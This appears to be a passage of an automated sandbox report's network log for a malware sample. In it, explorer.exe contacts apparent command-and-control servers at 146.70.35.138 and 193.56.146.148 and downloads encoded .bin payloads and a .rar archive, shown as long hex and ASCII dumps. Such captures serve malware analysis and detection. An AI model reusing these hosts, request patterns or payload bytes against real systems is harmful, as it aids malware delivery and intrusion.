Apr 22, 2022 16:15:22.345053911 CEST	349	IN	Data Raw: db 8f 61 c6 68 2b d1 8f 14 b3 9c c8 2c 73 0d 84 d3 ad 26 b4 a9 38 97 60 49 96 1f 0a 6b 6f ec 37 71 04 a4 ed 9b e2 ed 27 0d f6 c8 90 4d f2 d9 7d 92 df 49 1c 78 b6 95 04 24 d0 9e 5d 89 27 7f 93 1e 2b 16 4b 2e 88 3a 65 06 1d 51 f3 bc 5c b5 61 03 88 Data Ascii: ah+,s&8`Iko7q'M}Ix$]'+K.:eQ\aw,4^?9h#JXfM{Lgn B=:\pcE,i(>N0qLK5%+Dn(1sD132v/.-w>`9KU=
Apr 22, 2022 16:15:22.345084906 CEST	350	IN	Data Raw: 68 cc 48 a4 b8 01 93 96 94 d1 09 8e 46 56 4f 7e 5d d0 98 21 3e 75 28 54 6c d7 0f 3f 71 8c e3 f8 79 70 3c b0 ee a0 ff a3 09 9c f8 2f 15 db 96 6d 62 6e bb b2 21 0b 61 4e 91 00 ff 3f 25 aa 37 5c 6b 2e b7 a2 f8 96 f9 54 36 23 c7 68 4f 98 1b 86 2b 3a Data Ascii: hHFVO~]!>u(Tl?qyp</mbn!aN?%7\k.T6#hO+:w_B&]JPAA^<rSO%\|6oer})QKJ{Rg5xJX]\ED{X0-$#8W:VYcB$UdF^
Apr 22, 2022 16:15:22.345135927 CEST	352	IN	Data Raw: 05 af 19 43 58 fd 46 c6 67 41 2e 59 62 82 02 4d 43 e3 3f 15 01 9b ba a4 18 e3 8b 78 fa 5c b7 19 fd c6 fb 05 28 ea f8 6a d4 99 20 db f8 2e f4 60 3b 54 1a 1d 3c 8e 05 cf 9d 9b 0e 7a 8d a4 f6 96 dd ae e3 e5 13 88 06 6d cf 84 93 13 1c 43 7a eb 41 48 Data Ascii: CXFgA.YbMC?x\(j .`;T<zmCzAHbvz0+{T&+KHfo(wj`$=;\S2H7WTA8sQ~u%A9RZqvgp2!iRI\aj anD
Apr 22, 2022 16:15:22.345160007 CEST	352	IN	Data Raw: 1a 44 e7 2a f5 4d d8 7a 2e 62 9d e8 d7 19 b9 b6 4b b6 5e 74 5b 78 3d d0 f7 50 93 da 7c 11 6d 8e dc f5 13 67 82 48 2b b7 d3 30 17 82 ea c8 3f 45 54 df 55 59 34 db 4f 01 16 ea fa a4 f0 1c 38 03 77 56 14 a2 88 08 df 60 da 4b 51 9e f0 0f 5a 0c 35 fd Data Ascii: D*Mz.bK^t[x=P\|mgH+0?ETUY4O8wV`KQZ5,#]J0aivK!Gr\%:QPY-j'qvy2BDPs7/U@u[Md&%^O&9_WU=}eB2&RK!
Apr 22, 2022 16:15:22.384258986 CEST	354	IN	Data Raw: be 79 f4 7a ed 76 9e e8 f5 2f b5 43 e1 f7 a9 0b 51 a6 1f a5 32 b1 8a 63 d4 02 96 8e 03 19 7f 26 a0 e7 1f 13 84 9c ed 61 e6 27 c9 b9 69 78 07 27 4c 09 a1 e7 73 7e 11 d7 29 74 d8 81 b8 90 3c 74 a2 5f 06 ac 64 35 a5 ad ff 62 bc d8 03 1b 0d 06 c1 d2 Data Ascii: yzv/CQ2c&a'ix'Ls~)t<t_d5b~,6(ZuCVJn22gxIPLk;B-<C >$X~[ai /FFk+KT%t'.R uJw8
Apr 22, 2022 16:15:22.811302900 CEST	539	OUT	GET /phpadmin/zilwS36OC_2/FnjmOckuG_2BCm/VAdwDdj_2Fnac_2F0y6xc/deXhx0rBocPzi7tR/z8VoemZhKDJOEZ_/2FB71dJS5j3dZE2NGK/cGLO3t6yJ/yUrrIk8eZ08FZSU_2FS0/2G1FFOzId8doUQdjVtt/kPQnX57urwlFySqx1IZrAD/AgrnwQGGtXT4R/Tizv3fN7/xX9kvTCwfaZ1KZbAGWbajAo/gFAssOtH9Z/e8lp2TS1JzI4llaNY/olcdYO51/byt.src HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 146.70.35.138 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:15:23.208308935 CEST	540	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:15:23 GMT Content-Type: application/octet-stream Content-Length: 237210 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="6262b87b2a943.bin" Data Raw: c5 94 a1 d4 cf 01 54 ad 67 b8 35 ce fb a5 32 f4 b8 b7 20 18 bc af a0 b9 ec 7b fb 86 8b 40 5e 0c 4a 06 ae 62 ba 7e a8 0e 1b 4e 14 4a 61 22 66 60 c1 90 c2 5a 82 32 07 b5 0a 28 8e 7e ea 85 17 e2 57 83 3e 40 70 7a c8 68 8c 7d d1 83 2a 85 e7 64 0d ab 77 92 0b f8 d4 ae aa 6d 4c 70 33 cb 56 58 74 22 20 f5 7b 99 7b 0e 65 8e 51 07 ac ce 98 00 ec e4 f0 89 47 50 b4 65 b8 e6 23 43 ea 16 0d b5 8e 48 c9 d4 b9 c9 0f 48 2b 92 f5 d9 19 96 9f b7 32 8f 57 f8 3a 9c fc 78 1d 08 05 6b ca 6b 56 e1 08 8a 76 14 44 72 99 2e 7d 22 b0 6c 29 5b 8c 06 be c3 af d8 ef ff 64 73 b5 62 45 13 3e b1 99 c6 c3 60 ae 9b 3e dd 20 19 6a a3 cd 7a 59 d5 b4 c1 aa a6 dc 4b 26 e5 4e 0a ac 02 9b 15 7a 9d 51 f7 1e e8 c4 41 6e b0 8e ff d2 ab 95 a3 8f 5b f5 e4 4b 8d 05 c5 21 c3 0d 04 92 f1 83 5d d6 cd 19 d6 95 ef 7a 20 dc 91 10 4b 51 4d c4 2f 7e 03 c5 fb c7 08 d6 e6 74 2d 56 44 d8 a7 57 e5 91 1a 81 81 28 8e 88 63 7a 12 47 80 4d 99 4c 72 45 22 50 02 d6 85 c2 6c fd db 8c 27 af ef 7c 2f 5d 7c 0b e5 88 33 be dd 60 30 74 74 8c a3 06 b9 ed d1 2c 46 b0 e9 a1 97 b3 ea 80 a0 99 6b 07 3c 37 c9 12 1f ca d9 c3 f6 bb 95 dd 15 23 53 41 27 6f f3 b7 88 01 8a d4 d8 80 fd 64 fa 32 a6 51 db 9f c7 ee e4 2d 78 68 27 22 5a e0 e3 ba 67 38 ba 44 d8 c0 55 c4 ec 9a 89 db f1 e0 2e d2 f7 a6 dc 66 3e 69 cc e8 de eb f3 85 39 5d 45 7f b9 f1 d9 92 47 72 e8 1c dc 16 5f 94 8a 34 c6 6c c7 7f bf 51 e6 91 79 6b ec b5 f2 72 8a 6e b3 d4 29 d2 4a 3d 65 71 97 ed a8 79 9f fb cb 30 cc fd 81 1c 66 39 8a b5 b5 5f 2c dd e5 5b 58 45 3b 5a 92 5c 70 43 7f 69 e1 9b 6d 7f db ab 8b d9 4b ae 21 5f 89 c8 75 0c 23 18 67 b6 b0 86 9b cc 76 18 15 a9 b3 09 79 d9 aa 99 d5 8b c9 51 00 53 c1 31 2b cd 41 d0 8a 96 d9 92 f2 7f 67 79 25 7f e2 62 ad 75 e8 be a6 7a 01 eb 0c f3 5a 4c 9f 68 d1 7f e9 9e 7f 08 a9 1c 84 4b b7 f0 66 31 a6 2b 57 22 e5 0e 43 be b8 fc 02 48 c9 d3 b8 1c e9 cc 51 f3 27 a8 b6 0c 56 89 f3 0e 39 c0 70 63 51 a6 e5 fc 29 3c a8 0f ec 59 d0 f4 34 c5 27 e7 61 7b 18 d0 12 e9 ab 44 40 e0 f6 7f 5e 83 98 d8 bc 67 ce ce 0f e5 1f 97 a0 21 8a 8e bc 55 43 ed 76 28 e5 0b 47 e0 f3 ff d0 21 b2 bc 73 a8 04 22 a6 ff 80 9f 8f 27 4d 47 a6 c6 82 70 1a 05 2d e6 88 42 ba 6d eb 81 16 9c c2 93 e2 65 77 90 f6 1e fa 29 11 df 98 6b fa 90 d3 03 e2 3a e4 ea 7c 50 f4 57 34 74 0a ea 2a 2c c1 b6 1b 90 45 b5 a5 5d c8 a3 e5 2d c5 1b 47 36 e5 5e 5c ff 60 5b 86 7b 3a 3b 37 57 9d 83 86 72 e8 ac ff 51 7d 5b 56 f9 58 9b fc bd c3 ae 7f 17 f4 86 5d ac bf 83 30 cc a8 ac 1b 10 85 b4 67 38 3f 05 02 4b 10 c3 bc 6d cc 98 fe aa 9d fd 82 48 09 5f 6d c5 24 98 bc 1e 8d d0 32 3a be ba 5b cc 59 71 10 19 db f1 27 b4 18 19 51 81 c9 dc 2a 68 da d5 ca 34 87 4e 78 63 94 78 3a e6 ce 53 d9 88 10 f3 a7 80 63 78 a7 38 76 d7 18 61 67 78 00 29 51 09 8f 4c 89 4b ca 92 9c 13 7e 59 39 a0 51 aa fa d1 03 3b 4a 5f 67 d0 85 63 ea 30 6f 0d e8 09 ae 34 e7 8a 90 d9 95 4b fd 26 05 fb 0e 7c 02 b0 0c f9 67 df 98 0f 79 8c 6d ff 0c e7 be 6a b7 12 29 4d 0b 62 99 8f 98 67 62 02 8d b2 49 94 fa b5 be b0 ec 6a 9a af d8 30 7c aa 3f 85 d3 66 54 02 99 b6 98 bd be ce 73 8d 03 3f fe 89 4f 99 33 c1 d3 c5 bf fa 8b fb Data Ascii: Tg52 {@^Jb~NJa"f`Z2(~W>@pzh}dwmLp3VXt" {{eQGPe#CHH+2W:xkkVvDr.}"l)[dsbE>`> jzYK&NzQAn[K!]z KQM/~t-VDW(czGMLrE"Pl'\|/]\|3`0tt,Fk<7#SA'od2Q-xh'"Zg8DU.f>i9]EGr_4lQykrn)J=eqy0f9_,[XE;Z\pCimK!_u#gvyQS1+Agy%buzZLhKf1+W"CHQ'V9pcQ)<Y4'a{D@^g!UCv(G!s"'MGp-Bmew)k:\|PW4t,E]-G6^\`[{:;7WrQ}[VX]0g8?KmH_m$2:[Yq'Q*h4Nxcx:Scx8vagx)QLK~Y9Q;J_gc0o4K&\|gymj)MbgbIj0\|?fTs?O3
Apr 22, 2022 16:15:24.287033081 CEST	794	OUT	GET /phpadmin/TYhCb5d3/Qd3Po_2BKjelP_2F7WSwUso/7m8jnTpLRx/uExGwdKAdHoPBjWMC/elgD5kzT2sqT/T1iJBxA5UdT/uL5VED_2B8E0P8/_2FtpnrB_2FZlg9AlWg_2/BdtlwpvI_2BcVtwg/McOCY72thR3WVt5/wVoK31AOn6hDpHdQON/XBB32U4r8/fKY68F7l0jZNTMcXJ71L/odruZsWwSuNEIUWqi7s/08LTc4yWUohU0pkFp1T8P2/l2fvxomE6/r6zvT.src HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 146.70.35.138 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:15:24.667445898 CEST	796	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:15:24 GMT Content-Type: application/octet-stream Content-Length: 1869 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="6262b87c98b4c.bin" Data Raw: 40 d1 e5 5a 8b c7 b4 20 04 1d ee a2 24 f1 96 9d 26 a1 0b 1b 7e e3 4e 1f 5d 3c 4d da 10 7c 95 81 0f 16 f7 ee 7d fb 39 8c 70 71 45 d9 0f ab ad 60 01 a5 32 5d be 0d 61 0e 50 82 f8 65 5b 9a 22 17 77 7e df 1d d3 e9 2a 08 c4 85 a2 d9 7c 2f 82 76 1f a1 0c 49 88 f8 0e c9 2d a0 8a 50 56 c2 c7 92 94 e2 ec 7e 79 4a 65 9b 26 e4 dd 72 cc a9 e7 63 18 5b ca dd df b9 3c ff 59 43 c8 9c c3 1a 12 d9 00 09 54 eb 65 b3 47 f4 68 0c b2 8f b5 20 fb 61 ad f0 29 d6 ef 6f ad 1f 9b 0f 56 f2 39 7e b4 2e 17 15 94 17 47 de 21 36 e1 25 3a 1c 1e 8d 36 93 c2 c8 4e 60 10 93 49 cd cf 19 4f 0c 1f a5 d3 5d df 25 13 ca 40 20 64 fe 4b 27 eb fb 5b ce 56 73 77 b6 d4 6f 61 c2 6b 4e fe cb 73 77 22 e9 f6 1d 48 0c 2e 7a d7 73 4c e6 51 80 cb f5 e3 20 5b 24 a3 68 83 38 6a 87 1d d6 fc d3 cf f2 a2 a3 35 f3 19 e8 ac 2c e4 cb 70 a5 b0 92 e2 87 00 7b 31 2a 0d 22 de b4 1e 6d 5d 7c 13 90 ef 11 74 34 aa 7e 6b 92 3a e5 d5 5c be 59 0b ec ab 8a db cf 67 a8 2b 63 24 50 a1 20 ed 30 f3 e8 e0 28 6b 51 f4 5e e9 8f c2 69 d8 28 69 51 46 a7 72 50 9d 2a 97 f7 91 81 7c 6c 5a d0 ba ac bd 1c d8 97 9e 7f 2d 30 0e 8b 0a c6 f9 a4 b5 dc 66 f3 19 b7 79 89 51 9b eb 95 fa e6 32 f7 db 83 04 be d0 a4 34 40 10 7b e0 ea 75 18 6e 32 43 93 ff ec 97 e9 13 de b1 39 90 ae fd b1 88 f6 eb a8 a3 5f d3 40 f2 8a c8 1a b5 da 23 07 28 14 d4 48 91 e4 75 6c 2e 2f 59 14 ed cd 56 33 a4 6f 3c 74 70 51 26 d2 f1 00 9d c7 9e 68 ca 93 01 b0 18 8b 9c 3a 19 27 47 cf c7 cc f2 d1 42 aa e5 ce 1f 0f 07 03 9a 24 72 37 bc 30 c3 42 3d 57 49 09 18 78 26 bc 66 1e 36 de 2a c7 72 0d 10 ee fa 93 05 a5 63 7e 1c e1 d8 c6 71 0e 0f 77 91 6d aa 79 b3 3a 27 fe 2e 3b 53 ad 84 37 f4 45 54 52 da 80 67 3c 9c 44 86 2a a7 58 26 94 83 b1 bd ca d7 ad 1d 43 f8 70 2b 43 d2 05 fd d2 bd 6b 6f 62 28 7b 75 60 c4 14 07 07 2c f7 3e f3 95 1f 56 90 0c 06 3e 6c 02 6c 89 e1 6c 0b cb a0 a3 9c ba 25 72 e8 31 27 75 22 9d 20 f7 46 af 10 5d c0 d6 ec 16 ab 36 03 82 9f fb a2 ca 77 e2 f1 69 ad fe a5 b9 2c 1b 4a e3 1d 69 43 fc 81 b7 22 57 f1 2c fa 72 4d 17 49 56 ad 1f ff 4a a5 38 50 c9 b2 68 b3 c4 e2 33 e0 9b 81 eb 69 56 89 c3 9b 32 9c 57 30 ee 5d 75 8b e2 b2 d7 ee fb a8 48 a0 5e f2 34 a7 15 38 ac ae 28 2c 60 6f 00 b8 12 2b bf 5a 7d fc 9d 1c f0 1a dd a6 92 7f f1 c5 f3 02 e2 83 f6 a1 52 db f7 14 b9 38 35 28 e6 2b 62 1a 3f b8 e0 b5 43 ea a8 92 b6 60 5b 95 b3 d5 09 19 61 54 a7 f6 67 69 2b 6d 9e 93 4e 6a 56 d6 3f 53 09 df 02 18 fe f4 5e 79 48 1e 9b 82 dc cf fb 80 f3 bb 65 a6 56 0e 5a e8 78 a7 13 70 ac ce cc c9 43 75 3c f7 ef 58 23 f8 c7 88 e3 17 85 ca 17 bb 6e 86 b2 4d 6f 8a da 5c 1b 90 9a d2 4d 26 35 99 bb 8b 29 ea 31 7b 6b 5f b9 0e 00 3a a4 e4 ea 72 09 48 da 0c d2 ae 7f 25 91 ec 37 59 6e 37 a1 80 7c 8e 19 d1 1d 3a ee dc 6d 6a 4c 0b 42 b6 2b 61 83 0b d7 d9 f5 f6 ce 72 f7 b5 90 05 e5 3f 8a 59 21 da ac 86 48 37 1f 98 8f 3a 7e a8 72 fb a7 30 f0 f0 02 05 b3 ae ea dd 01 b1 44 fd d2 ee a8 d7 98 54 14 92 eb 8f 4e 62 a3 f2 7e 80 f8 92 9d 71 a2 ed 5c 8a 7c f2 dd 5c 75 7c 65 29 cd 7c e2 5d aa 2d f2 1d f5 f7 ab 93 ec 3b 66 10 48 80 13 8e 53 aa 6d ca d6 5e d2 47 e2 a0 4b fe ca fd 03 fd fa 45 3e c5 74 Data Ascii: @Z $&~N]<M\|}9pqE`2]aPe["w~\|/vI-PV~yJe&rc[<YCTeGh a)oV9~.G!6%:6N`IO]%@ dK'[VswoakNsw"H.zsLQ [$h8j5,p{1"m]\|t4~k:\Yg+c$P 0(kQ^i(iQFrP\|lZ-0fyQ24@{un2C9_@#(Hul./YV3o<tpQ&h:'GB$r70B=WIx&f6rc~qwmy:'.;S7ETRg<D*X&Cp+Ckob({u`,>V>lll%r1'u" F]6wi,JiC"W,rMIVJ8Ph3iV2W0]uH^48(,`o+Z}R85(+b?C`[aTgi+mNjV?S^yHeVZxpCu<X#nMo\M&5)1{k_:rH%7Yn7\|:mjLB+ar?Y!H7:~r0DTNb~q\\|\u\|e)\|]-;fHSm^GKE>t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49842	193.56.146.148	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 22, 2022 16:17:41.267824888 CEST	7948	OUT	GET /stilak32.rar HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 193.56.146.148 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:17:41.338412046 CEST	7949	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:17:41 GMT Content-Type: application/x-rar-compressed Content-Length: 345757 Last-Modified: Tue, 15 Feb 2022 12:21:38 GMT Connection: keep-alive ETag: "620b9ad2-5469d" Accept-Ranges: bytes Data Raw: 58 35 47 8f e8 82 a6 72 f1 89 40 c8 0f 2b 14 05 63 77 e7 dc 78 c6 da 87 72 79 b9 3d 62 27 63 83 37 71 62 40 0f 9a de 97 59 6e 9f ae f2 94 7c 42 cf 29 76 b1 99 3f 1c 71 77 d8 a0 4f b8 ef b1 be 22 e6 5b d0 3a a5 11 4c 6f 9c 0b 85 8a 22 c4 2b 29 8f 0d 9c c1 99 d6 ea 4a de c1 45 72 53 27 3a 15 a4 f0 6c fa 65 82 2f d5 cc 25 1f b5 c5 46 91 de 36 dc d7 57 01 1d 68 cb 3e fb 34 73 75 d4 b6 26 85 56 56 a5 53 ec 7f 8e 45 7c 0f 04 3a e2 5c 8e 38 6b d4 a4 c9 33 f1 e8 9d 9c cd c9 d9 31 91 80 a1 fb 3b 34 f0 4b d5 fb 29 88 6e 34 28 73 68 1b 7c 99 1b 0b b0 e3 31 af 72 38 ff cf 4d 82 9b 1f 9e 95 4b 6d 9e 1a 2a 78 67 1c 82 58 31 32 16 8e 7c 3f 9d c6 25 bd 3d 35 6f 5d a5 ff c1 2f 00 22 9c 3e 60 f4 6f 45 70 47 1a 97 d0 0f 52 bf a5 60 07 3e 3a 01 90 c6 99 e6 d7 8b c6 88 61 1d 28 51 f1 00 be 13 f2 05 dc ee f4 ab f6 3e 91 af c9 27 f4 fa 42 52 c6 b6 5d d1 8c b8 ae 13 d6 67 1b 56 2c 4c aa 32 e5 98 ef 4d 36 97 39 02 74 71 22 f0 ec 1a ed 63 97 f0 b4 b8 e3 55 e0 1a c5 3b a7 c8 40 7a 62 8b 8c 19 78 0f c1 61 93 e3 82 65 06 98 b9 bb 88 04 d5 c8 94 9a 26 fa 9b 78 7a 12 55 ca 9d c0 9d ec 92 e8 f6 83 26 03 b0 3c b3 21 d1 50 1a 32 9d a1 58 3c bc 54 ac 32 af 28 4d 3e 49 44 ba a1 3c b2 51 a0 c7 a0 9f a2 86 4e 4e 1a 65 79 e2 63 67 c5 ed 42 b3 02 b9 79 98 f1 d0 84 7a 70 9e 64 be 21 79 0f 63 85 a2 c1 d6 b0 7f 47 ee 61 ea 37 68 44 9f e1 8a 57 65 c3 53 0b d7 96 9b 20 f8 83 1f 48 c3 45 93 cc c8 50 2d 07 44 8e 58 19 82 df b5 a1 26 72 61 0e 8a 11 d0 04 25 ae 9a b8 13 5a 2b a4 c5 cb f9 4d cf d8 47 9a 61 80 a3 b3 75 ca f5 34 43 a7 5e 22 b4 14 65 55 4b fa 3d 90 c3 6c 9f 4e ad 5e 5d 6d f1 98 6d 96 d8 0f b0 69 d6 4a a8 9f 43 51 5a 69 e2 8b cb 14 cc eb 2b 0b 1f 3f 61 8a a1 e4 1e c1 fb 76 b9 5c c2 75 8b 47 e6 86 b7 04 b8 89 75 78 ef fe fd 6c 22 50 bb 95 16 ad ff eb 94 c3 99 22 b3 5e 8f 15 72 56 13 bf dc 75 22 9c a3 75 7a ff d1 88 80 2c bb 8a c5 cd ec b1 59 00 f7 fb 14 17 98 ef aa 47 b3 63 a3 d8 a0 8e b6 ec 17 4e 7f 31 10 92 e2 84 8c f0 fc be a7 f8 34 2f ea 47 c3 e7 12 72 ef 08 ff 91 57 13 b6 37 69 76 ed 9f 2d 7e 93 70 35 b2 25 84 6f 80 db 26 96 3a e5 32 df 9d dd a9 e6 a3 ea 4f c0 b4 d1 3c f4 7d 63 9c 1c 5b 0f 7f 5b 9d 04 63 d8 fd 96 d7 0b 24 d0 0c b5 88 94 ee 88 88 40 6d f7 78 a7 aa a6 cc 0c a6 bb b6 a7 93 ea dd 68 56 93 b7 16 a4 09 05 e3 e2 c3 10 2a f1 e5 b0 82 4e 03 3f a3 00 28 22 77 57 f7 6f 69 64 a3 89 3f db 81 09 26 06 fd 3d 7f ac c2 e8 98 e4 69 bc 66 8d a5 de 08 18 eb 99 3a ad 56 ca 06 93 5a 54 24 bd 3d f3 37 d3 cc 00 c2 2b c9 e2 8b ef 86 dd 7a 7c 27 71 ca 91 1f 86 95 01 6e 3b e7 05 95 73 2e 22 d4 de 2d 45 96 14 03 bd 12 17 93 6e d6 45 d1 28 af 75 c5 aa 09 2c e5 71 ff 02 3a 2e 33 d0 f0 ab 63 ba df 16 51 5b 65 87 ef f3 b1 67 86 3c 16 3a 4b 0d f0 6e 18 26 fe 7f 6e 5a e7 ec 94 ea c2 61 52 55 98 cd a8 21 e0 48 7a 07 ed c3 ea 11 22 3c 73 57 91 38 82 f3 10 96 f6 54 7a 70 00 17 cb f1 71 aa 71 e9 c5 7b 15 58 d5 f3 bd 3c 25 f0 28 7a f6 f4 79 da b3 77 03 a5 f8 44 f9 5b 28 48 9a 16 39 d0 4a 1c d4 fe 09 3d ca f5 9c 70 60 d4 19 db a9 e6 1b ba 57 62 60 7b a7 79 d8 2e 51 83 af e8 d7 7a 12 cb 04 60 cd 85 b3 bd 3b c0 64 51 5c 60 91 21 ba 8b 14 79 e3 6e 60 24 02 23 87 b0 ac a4 3b 1c 57 c6 d5 81 41 07 99 3a 7a 07 b6 2e 9d c2 5f ef f1 ce eb 12 08 a2 7d b2 94 87 aa ea e0 34 69 ea 61 1d 81 b8 5a 08 81 6f 9f db Data Ascii: X5Gr@+cwxry=b'c7qb@Yn\|B)v?qwO"[:Lo"+)JErS':le/%F6Wh>4su&VVSE\|:\8k31;4K)n4(sh\|1r8MKmxgX12\|?%=5o]/">`oEpGR`>:a(Q>'BR]gV,L2M69tq"cU;@zbxae&xzU&<!P2X<T2(M>ID<QNNeycgByzpd!ycGa7hDWeS HEP-DX&ra%Z+MGau4C^"eUK=lN^]mmiJCQZi+?av\uGuxl"P"^rVu"uz,YGcN14/GrW7iv-~p5%o&:2O<}c[[c$@mxhVN?("wWoid?&=if:VZT$=7+z\|'qn;s."-EnE(u,q:.3cQ[eg<:Kn&nZaRU!Hz"<sW8Tzpqq{X<%(zywD[(H9J=p`Wb`{y.Qz`;dQ\`!yn`$#;WA:z._}4iaZo
Apr 22, 2022 16:17:41.338543892 CEST	7951	IN	Data Raw: 87 02 ff 01 a7 2f 4b ae e7 d8 ea 6f f2 b4 d6 9e d7 bc 42 f5 9b 12 0e ff 04 e3 73 28 b3 88 1c 7b 7a 14 eb b5 1a 0f d4 16 45 db 65 5d ff b4 5c 8f 16 60 1c 1b 51 f9 f3 5d e8 05 03 83 e7 90 6f 77 de fd a5 99 b6 69 e2 7c 56 00 49 a3 bc b8 ba 21 b9 7c Data Ascii: /KoBs({zEe]\`Q]owi\|VI!\|XDoqw7M;OU:\|Su.YoSc3nW8{xYO.tkth@63~a^5p,7L^s_}%"-.*Vn6 zr9X r{-kmV
Apr 22, 2022 16:17:41.338576078 CEST	7952	IN	Data Raw: 9f 46 d9 d2 71 fa 90 0c 10 0a 27 09 7e 62 4b b1 32 49 a2 b6 00 4c 7a 8e 5b 95 77 d3 65 f0 c1 c4 d6 ea aa 82 d4 b4 91 c9 1c 68 dd 7f 93 63 e0 49 b3 6f df 4c b5 ad 0b 79 72 a3 76 58 5a 5a 45 c1 e9 11 66 82 8d c7 ff 9b a7 f8 2f 7d bd dc d5 54 09 be Data Ascii: Fq'~bK2ILz[wehcIoLyrvXZZEf/}T`v#]-820\8N3t!VlM^]wiSO bX%>V?ElyI=X=eg\|xf*K y/ k#8<-??(7]3f`b>$
Apr 22, 2022 16:17:41.338599920 CEST	7953	IN	Data Raw: ec 52 6e a3 d2 3d be 4d f3 7d 0a 10 d6 0b f9 ff 70 af 7c f7 39 15 9d b2 89 b9 fd e6 49 f8 64 44 12 6b a6 e9 44 14 77 44 ca 89 53 1e 1b 52 7e d9 b3 f4 46 de 9f 06 b8 de 78 51 48 bc b9 95 22 6b ab 00 16 ac 6f 2c e9 91 e7 2d a9 4c 4f 49 8b 78 57 6d Data Ascii: Rn=M}p\|9IdDkDwDSR~FxQH"ko,-LOIxWm>YzL]ED%xNz,[&f>&bCiaKOn)F}9}t{D>&.q[ezd/~v@hyXb:8^0
Apr 22, 2022 16:17:41.338624954 CEST	7955	IN	Data Raw: 9d cf 91 74 53 79 1e 9d 48 7e 28 3c 43 60 2f d8 08 aa 9e da ff 4c 76 e3 f9 09 a0 94 ef d4 6e 21 b3 a7 38 e1 74 96 f5 15 98 aa c5 21 27 4b 12 b7 b8 d6 17 ef 10 ee a5 47 6d c7 61 e5 73 31 70 e5 c8 f5 f6 8c 6f 81 ed ed b7 8f 5d 6c cd 91 b6 48 e0 4f Data Ascii: tSyH~(<C`/Lvn!8t!'KGmas1po]lHOq3oO[x#^%os]:{&p!2@,$eL^dRUv"I!r\|Y^tBv;K"x[X`Wsx`n!*Rx]cCy~<
Apr 22, 2022 16:17:41.338649988 CEST	7956	IN	Data Raw: f6 91 27 f2 be 34 51 06 c5 1a dc 01 5e 9b c5 68 92 ec 95 23 0e 91 42 54 8b 8c b8 b2 83 ff 8d 80 e2 62 6d 68 0d bd 56 ce 34 e4 b8 a9 ed 77 46 35 30 e2 b3 56 2b c8 c1 5f 5f de 05 1c 82 48 29 c4 98 36 da cf d2 53 46 c0 43 71 0c f1 56 b8 b8 fa bb 7d Data Ascii: '4Q^h#BTbmhV4wF50V+__H)6SFCqV}%5Y\|WzyU;EhjL`:kM@2A(qcX9dteDLOJT-^#;{`5wfE{T2og Y;%B\|gFWA`EF
Apr 22, 2022 16:17:41.338674068 CEST	7958	IN	Data Raw: a1 b0 2f 7b 55 4d 4b ff 1a a2 8c 89 41 0a df fc b2 ab 8a af 0f 33 47 7a 72 8b 05 5d d5 0c a3 e7 69 1d b6 07 4e 24 d2 bf df dd 56 71 56 4f 42 51 9e 12 ed f5 29 4e 98 e0 36 1e dd 28 1b b3 b3 a5 28 6f 65 9f 1e 8b 00 c4 55 31 7e 45 29 5d db e7 f5 d9 Data Ascii: /{UMKA3Gzr]iN$VqVOBQ)N6((oeU1~E)]E2/e f97:a?$9aF iuDzmnW==Ra5^OO=?h[pK>Cb"!"1x\la#h H
Apr 22, 2022 16:17:41.338697910 CEST	7959	IN	Data Raw: ea 57 73 53 86 0d e4 bd 53 28 4a 9a 31 5a 3e ee 27 4c fd ed 4e f5 78 d8 6b 1e de 30 46 fd a5 a6 47 02 74 cc 0b cf d3 07 1f fd 58 25 78 50 d1 98 bb 2a 5d 5f 90 b5 1f 52 2d b5 22 d9 66 ca ad 39 de a4 06 19 32 03 bf 92 da 7d e0 59 90 2f 89 b1 c0 23 Data Ascii: WsSS(J1Z>'LNxk0FGtX%xP*]_R-"f92}Y/#wR/j9rD>9 b{[IbD\ 4iRY>n\|bcCj3\|tt1IVe~Xp!)V$OJdJa)\ LQ,
Apr 22, 2022 16:17:41.338721991 CEST	7960	IN	Data Raw: 8a 21 7f 29 cd 64 4d 05 30 be fc cd 1f 28 c0 c9 bf 29 27 63 e4 8b ad 69 e2 dc d2 c4 9c 3c 93 67 03 78 43 2a 54 7b ed cb f7 c4 bf c9 65 ce 4c 13 b4 06 85 79 a2 00 d7 f2 8f 84 68 c1 7b 9c 63 cf 7c e8 91 be 0a 7f a7 58 54 51 2d 79 39 74 00 84 23 b9 Data Ascii: !)dM0()'ci<gxC*T{eLyh{c\|XTQ-y9t#"=\Qsi4w&s\:aKho&n-0xQ^@BF7eu.)9yT+!GaPn2%j5D5v7hk.l$T$R7-f(Wb\LEOo=,V
Apr 22, 2022 16:17:41.338746071 CEST	7962	IN	Data Raw: 79 ab db 09 71 05 c7 9e 1f 63 de ec 79 62 f0 97 1e e9 77 48 ad a4 f0 65 41 8f 14 a1 94 11 45 18 6a e0 af 36 db ad a9 ca 6b 38 13 16 b4 3f 90 eb 0e 13 e3 18 3c ed c3 da 38 92 fc ac 06 a9 20 38 12 15 32 b0 1f b1 6e 3e 3b 40 2a 37 6d 06 1c 87 33 59 Data Ascii: yqcybwHeAEj6k8?<8 82n>;@7m3YwM`wV0+$oEr8'"[nlP\~Q&F]'<@<W0GskugHDSxFV>RTEr:!PNW^*j"\|t:o9,eejN'k}
